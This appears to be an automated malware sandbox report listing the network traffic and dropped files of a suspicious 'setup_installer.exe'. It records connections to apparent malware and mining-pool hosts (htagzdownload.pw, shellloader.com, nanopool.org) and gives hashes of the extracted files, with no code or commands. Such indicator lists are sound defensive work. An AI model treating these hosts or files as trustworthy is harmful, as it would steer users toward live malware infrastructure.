RU 45.9.20.20:13441 tcp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 google.vrthcobj.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 connectini.net udp
SC 185.215.113.104:18754 tcp
US 162.0.210.44:443 connectini.net tcp
JP 34.97.69.225:53 google.vrthcobj.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.21.70.98:443 live.goatgame.live tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 real-web-online.bar udp
US 104.26.12.31:443 api.ip.sb tcp
US 104.21.74.148:443 real-web-online.bar tcp
US 104.21.10.67:443 phonefix.bar tcp
US 8.8.8.8:53 liveme31.com udp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 172.67.132.120:80 liveme31.com tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 downloadlog.com udp
RU 188.119.65.241:80 downloadlog.com tcp
US 8.8.8.8:53 google.com udp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 a.upstloans.net udp
US 172.67.179.248:443 a.upstloans.net tcp
US 8.8.8.8:53 nopedope1.com udp
US 104.21.6.118:80 nopedope1.com tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 8.8.8.8:53 b.upstloans.net udp
US 172.67.179.248:443 b.upstloans.net tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 172.67.179.248:443 b.upstloans.net tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 172.67.148.61:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 maf-pub.com udp
US 104.21.91.222:80 maf-pub.com tcp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 172.67.173.237:443 bb.goatgamed.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 primods.com udp
RU 188.119.65.241:80 primods.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 95.181.163.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 shellloader.com udp
RU 45.132.17.116:80 shellloader.com tcp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
RU 95.181.163.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
RU 5.252.176.81:80 5.252.176.81 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 varmisende.com udp
PK 124.109.61.160:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
US 8.8.8.8:53 venetrigni.com udp
US 52.45.132.150:443 venetrigni.com tcp
US 52.45.132.150:443 venetrigni.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RU 188.119.65.241:80 primods.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 htagzdownload.pw udp
DE 144.76.183.53:63565 tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
RO 109.102.255.230:80 fernandomayol.com tcp
US 8.8.8.8:53 sanctam.net udp
SE 185.65.135.234:58899 sanctam.net tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 151.80.144.188:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 telete.in udp
US 8.8.8.8:53 collect.installeranalytics.com udp
DE 195.201.225.248:443 telete.in tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.23.98.190:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
MD 5.181.156.77:80 5.181.156.77 tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 3.209.18.1:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.232.36.43:443 collect.installeranalytics.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 162.0.220.187:80 requestimmersive.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 venetrigni.com udp
US 52.45.132.150:443 venetrigni.com tcp
US 52.45.132.150:443 venetrigni.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 best-protection4.me udp
US 104.21.82.246:443 best-protection4.me tcp
US 104.21.82.246:443 best-protection4.me tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.bing.com udp
US 131.253.33.200:443 www.bing.com tcp
US 131.253.33.200:443 www.bing.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 kimoangel.info udp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.59:443 images.scanalert.com tcp
NL 65.9.83.59:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 52.214.44.171:443 dpm.demdex.net tcp
IE 52.214.44.171:443 dpm.demdex.net tcp
US 8.8.8.8:53 s.go-mpulse.net udp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.80.224.132:443 s.go-mpulse.net tcp
US 8.8.8.8:53 mcafee12.tt.omtrdc.net udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 35.160.158.189:443 mcafee12.tt.omtrdc.net tcp
US 35.160.158.189:443 mcafee12.tt.omtrdc.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 6852bd0d.akstat.io udp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 c.evidon.com udp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
US 54.158.67.235:443 w.usabilla.com tcp
US 54.158.67.235:443 w.usabilla.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 15.188.95.229:443 smetrics.mcafee.com tcp
FR 15.188.95.229:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 8.8.8.8:53 t.co udp
US 104.244.42.5:443 t.co tcp
US 104.244.42.5:443 t.co tcp
US 8.8.8.8:53 d6tizftlrpuof.cloudfront.net udp
NL 65.9.84.147:443 d6tizftlrpuof.cloudfront.net tcp
NL 65.9.84.147:443 d6tizftlrpuof.cloudfront.net tcp
US 8.8.8.8:53 fernandomayol.com udp
BR 138.36.3.134:80 fernandomayol.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.16:443 images.scanalert.com tcp
NL 65.9.83.16:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 52.213.161.66:443 dpm.demdex.net tcp
IE 52.213.161.66:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 44.236.166.104:443 mboxedge35.tt.omtrdc.net tcp
US 44.236.166.104:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 trial-eum-clienttons-s.akamaihd.net udp
NL 23.209.125.81:443 trial-eum-clienttons-s.akamaihd.net tcp
NL 23.209.125.81:443 trial-eum-clienttons-s.akamaihd.net tcp
US 8.8.8.8:53 trial-eum-clientnsv4-s.akamaihd.net udp
US 8.8.8.8:53 154-61-71-13_s-23-209-125-81_ts-1631393728-clienttons-s.akamaihd.net udp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 trial-eum-clientnsv4-s.akamaihd.net tcp
US 8.8.8.8:53 6852bd0d.akstat.io udp
NL 23.209.125.83:443 154-61-71-13_s-23-209-125-81_ts-1631393728-clienttons-s.akamaihd.net tcp
NL 23.209.125.83:443 154-61-71-13_s-23-209-125-81_ts-1631393728-clienttons-s.akamaihd.net tcp
US 8.8.8.8:53 ti6uodlinwhzeyj5c7aa-p2c0l5-85e2ee1dc-clientnsv4-s.akamaihd.net udp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.109.143.146:443 ti6uodlinwhzeyj5c7aa-p2c0l5-85e2ee1dc-clientnsv4-s.akamaihd.net tcp
NL 104.109.143.146:443 ti6uodlinwhzeyj5c7aa-p2c0l5-85e2ee1dc-clientnsv4-s.akamaihd.net tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 w.usabilla.com udp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.67:443 analytics.twitter.com tcp
US 104.244.42.67:443 analytics.twitter.com tcp
US 54.160.67.78:443 w.usabilla.com tcp
US 54.160.67.78:443 w.usabilla.com tcp
US 104.244.42.5:443 t.co tcp
US 104.244.42.5:443 t.co tcp
US 8.8.8.8:53 www.directdexchange.com udp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 8.8.8.8:53 fernandomayol.com udp
MX 189.165.83.252:80 fernandomayol.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 kimoangel.info udp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.16:443 images.scanalert.com tcp
NL 65.9.83.16:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 54.247.138.82:443 dpm.demdex.net tcp
IE 54.247.138.82:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 54.244.27.30:443 mboxedge35.tt.omtrdc.net tcp
US 54.244.27.30:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 6852bd0d.akstat.io udp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 18.208.45.198:443 l.evidon.com tcp
US 18.208.45.198:443 l.evidon.com tcp
US 18.208.45.198:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 w.usabilla.com udp
US 54.158.67.235:443 w.usabilla.com tcp
US 54.158.67.235:443 w.usabilla.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.5:443 t.co tcp
US 104.244.42.5:443 t.co tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
US 8.8.8.8:53 kimoangel.info udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 images.scanalert.com udp
US 8.8.8.8:53 tags.tiqcdn.com udp
NL 65.9.83.86:443 images.scanalert.com tcp
NL 65.9.83.86:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 18.203.8.109:443 dpm.demdex.net tcp
IE 18.203.8.109:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 52.27.114.80:443 mboxedge35.tt.omtrdc.net tcp
US 52.27.114.80:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 2.16.84.148:443 c.go-mpulse.net tcp
NL 2.16.84.148:443 c.go-mpulse.net tcp
US 8.8.8.8:53 6852bd0d.akstat.io udp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.224.132:443 6852bd0d.akstat.io tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 w.usabilla.com udp
US 52.4.153.129:443 w.usabilla.com tcp
US 52.4.153.129:443 w.usabilla.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.5:443 t.co tcp
US 104.244.42.5:443 t.co tcp

Files

memory/608-114-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

memory/1192-117-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS062F51C4\libstdc++-6.dll

